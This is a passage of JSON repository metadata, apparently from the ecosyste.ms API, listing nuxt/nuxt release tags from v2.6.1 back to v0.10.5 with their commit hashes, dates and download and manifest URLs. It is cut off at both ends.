/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23